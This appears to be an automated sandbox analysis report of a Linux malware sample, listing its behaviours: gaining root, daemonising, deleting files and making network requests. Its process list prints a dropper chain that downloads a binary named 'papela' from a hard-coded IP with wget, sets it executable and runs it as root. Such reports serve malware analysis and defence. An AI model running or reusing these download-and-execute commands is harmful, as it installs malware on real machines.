Technical Information
Malicious functions:
Gains root privileges
Launches itself as a daemon
Performs process tracing:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
- /usr"/papela
- /usr/papela
Launches processes:
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- rm -r papela
- clear
- apt-get -y install wget
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- sleep 3
- wget -q http://145.239.212.1/dos/yol/diz/sur/aurora/papela
- chmod 777 papela
- su -c ./papela
- bash -c ./papela
- ./papela
- /bin/bash ./papela -c exec './papela' \"$@\" ./papela
- /bin/bash ./papela -c
- rm -r aurorakur aurorayon tscs ckaur
- sleep 0.3
Kills the following processes:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
- /usr/lib/apt/methods/http
- /usr"/papela
- /usr/papela
Performs operations with the file system:
Modifies file access rights:
- /usr/papela
Creates or modifies files:
- /var/lib/dpkg/lock
- /var/cache/apt/archives/lock
- /usr"/papela
- /usr/papela
Deletes files:
- /usr"/papela"
- /usr"/aurorakur"
- /usr"/aurorayon"
- /usr"/tscs"
- /usr"/ckaur"
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
HTTP GET requests:
- ft#.##.######.######bian/pool/main/w/wget/wget_1.16-1%2bdeb8u1_amd64.deb
- 14#.###.###.1/dos/yol/diz/sur/aurora/papela
DNS ASK:
- ft#.##.debian.org
Other:
Collects RAM information